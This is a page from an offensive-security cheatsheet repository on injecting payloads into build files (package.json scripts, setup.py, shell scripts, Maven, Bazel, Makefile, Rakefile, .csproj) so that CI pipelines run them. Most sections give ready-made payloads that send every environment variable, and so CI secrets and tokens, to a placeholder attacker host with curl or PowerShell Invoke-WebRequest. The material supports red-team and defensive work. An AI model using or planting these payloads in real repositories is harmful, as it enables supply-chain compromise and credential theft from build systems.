daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

package-managers.md (6502B)


      1 ---
      2 title: "Package Managers and Build Files"
      3 section: "DevOps"
      4 sectionSlug: "devops"
      5 sourcePath: "docs/devops/package-managers.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/devops/package-managers.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Package Managers and Build Files
     12 
     13 > Code injections into build files are CI agnostic and therefore they make great targets when you don't know what system builds the repository, or if there are multiple CI's in the process. In the examples below you need to either replace the files with the sample payloads, or inject your own payloads into existing files by editing just a part of them. If the CI builds forked pull requests then your payload may run in the CI.
     14 
     15 ## Summary
     16 
     17 - [Javascript / Typescript - package.json](#javascript--typescript---packagejson)
     18 - [Python - setup.py](#python---setuppy)
     19 - [Bash / sh - *.sh](#bash--sh---sh)
     20 - [Maven / Gradle](#maven--gradle)
     21 - [BUILD.bazel](#buildbazel)
     22 - [Makefile](#makefile)
     23 - [Rakefile](#rakefile)
     24 - [C# - *.csproj](#c---csproj)
     25 
     26 ## Javascript / Typescript - package.json
     27 
     28 The `package.json` file is used by many Javascript / Typescript package managers (`yarn`,`npm`,`pnpm`,`npx`....).
     29 
     30 The file may contain a `scripts` object with custom commands to run.\
     31 `preinstall`, `install`, `build` & `test` are often executed by default in most CI/CD pipelines - hence they are good targets for injection.
     32 
     33 If you come across a `package.json` file - edit the `scripts` object and inject your instruction there
     34 
     35 NOTE: the payloads in the instructions above must be `json escaped`.
     36 
     37 Example:
     38 
     39 ```json
     40 {
     41   "name": "my_package",
     42   "description": "",
     43   "version": "1.0.0",
     44   "scripts": {
     45     "preinstall": "set | curl -X POST --data-binary @- {YourHostName}",
     46     "install": "set | curl -X POST --data-binary @- {YourHostName}",
     47     "build": "set | curl -X POST --data-binary @- {YourHostName}",
     48     "test": "set | curl -X POST --data-binary @- {YourHostName}"
     49   },
     50   "repository": {
     51     "type": "git",
     52     "url": "https://github.com/foobar/my_package.git"
     53   },
     54   "keywords": [],
     55   "author": "C.Norris"
     56 }
     57 ```
     58 
     59 ## Python - setup.py
     60 
     61 > `setup.py` is used by python's package managers during the build process.
     62 It is often executed by default.\
     63 > Replacing the setup.py files with the following payload may trigger their execution by the CI.
     64 
     65 ```python
     66 import os
     67 
     68 os.system('set | curl -X POST --data-binary @- {YourHostName}')
     69 ```
     70 
     71 ## Bash / sh - *.sh
     72 
     73 > Shell scripts in the repository are often executed in custom CI/CD pipelines.\
     74 > Replacing all the `.sh` files in the repo and submitting a pull request may   trigger their execution by the CI.
     75 
     76 ```shell
     77 set | curl -X POST --data-binary @- {YourHostName}
     78 ```
     79 
     80 ## Maven / Gradle
     81 
     82 > These package managers come with "wrappers" that help with running custom commands for building / testing the project.\
     83 These wrappers are essentially executable shell/cmd scripts.
     84 Replace them with your payloads to have them executed:
     85 
     86 - `gradlew`
     87 - `mvnw`
     88 - `gradlew.bat` (windows)
     89 - `mvnw.cmd` (windows)
     90 
     91 > Occasionally the wrappers will not be present in the repository.\
     92 > In such cases you can edit the `pom.xml` file, which instructs maven what dependencies to fetch and which `plugins` to run.\
     93 > Some plugins allow code execution, here's an example of the common plugin `org.codehaus.mojo`.\
     94 > If the `pom.xml` file you're targeting already contains a `<plugins>` instruction then simply add another `<plugin>` node under it.\
     95 > If if **doesn't** contain a `<plugins>` node then add it under the `<build>` node.
     96 
     97 NOTE: remember that your payload is inserted in an XML document - XML special characters must be escaped.
     98 
     99 ```xml
    100 <build>
    101     <plugins>
    102         <plugin>
    103           <groupId>org.codehaus.mojo</groupId>
    104           <artifactId>exec-maven-plugin</artifactId>
    105           <version>1.6.0</version>
    106           <executions>
    107               <execution>
    108                   <id>run-script</id>
    109                   <phase>validate</phase>
    110                   <goals>
    111                       <goal>exec</goal>
    112                   </goals>
    113               </execution>
    114           </executions>
    115           <configuration>
    116               <executable>bash</executable>
    117               <arguments>
    118                   <argument>
    119                       -c
    120                   </argument>
    121                   <argument>{XML-Escaped-Payload}</   argument>
    122               </arguments>
    123           </configuration>
    124         </plugin>
    125     </plugins>
    126 </build>
    127 ```
    128 
    129 ## BUILD.bazel
    130 
    131 > Replace the content of `BUILD.bazel` with the following payload
    132 
    133 NOTE: `BUILD.bazel` requires escaping backslashes.\
    134 Replace any `\` with `\\` inside your payload.
    135 
    136 ```shell
    137 genrule(
    138     name = "build",
    139     outs = ["foo"],
    140     cmd = "{Escaped-Shell-Payload}",
    141     visibility = ["//visibility:public"],
    142 )
    143 ```
    144 
    145 ## Makefile
    146 
    147 > Make files are often executed by build pipelines for projects written in `C`, `C++` or `Go` (but not exclusively).\
    148 > There are several utilities that execute `Makefile`, the most common are `GNU Make` & `Make`.\
    149 > Replace your target  `Makefile` with the following payload
    150 
    151 ```shell
    152 .MAIN: build
    153 .DEFAULT_GOAL := build
    154 .PHONY: all
    155 all: 
    156  set | curl -X POST --data-binary @- {YourHostName}
    157 build: 
    158  set | curl -X POST --data-binary @- {YourHostName}
    159 compile:
    160     set | curl -X POST --data-binary @- {YourHostName}
    161 default:
    162     set | curl -X POST --data-binary @- {YourHostName}
    163 ```
    164 
    165 ### Rakefile
    166 
    167 > Rake files are similar to `Makefile` but for Ruby projects.\
    168 > Replace your target `Rakefile` with the following payload
    169 
    170 ```shell
    171 task :pre_task do
    172   sh "{Payload}"
    173 end
    174 
    175 task :build do
    176   sh "{Payload}"
    177 end
    178 
    179 task :test do
    180   sh "{Payload}"
    181 end
    182 
    183 task :install do
    184   sh "{Payload}"
    185 end
    186 
    187 task :default => [:build]
    188 ```
    189 
    190 ## C# - *.csproj
    191 
    192 > `.csproj` files are build file for the `C#` runtime.
    193 > They are constructed as XML files that contain the different dependencies that are required to build the project.
    194 > Replacing all the `.csproj` files in the repo with the following payload may trigger their execution by the CI.
    195 
    196 NOTE: Since this is an XML file - XML special characters must be escaped.
    197 
    198 ```powershell
    199 <Project>
    200  <Target Name="SendEnvVariables" BeforeTargets="Build;BeforeBuild;BeforeCompile">
    201    <Exec Command="powershell -Command &quot;$envBody = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes((Get-ChildItem env: | Format-List | Out-String))); Invoke-WebRequest -Uri {YourHostName} -Method POST -Body $envBody&quot;" />
    202  </Target>
    203 </Project>
    204 ```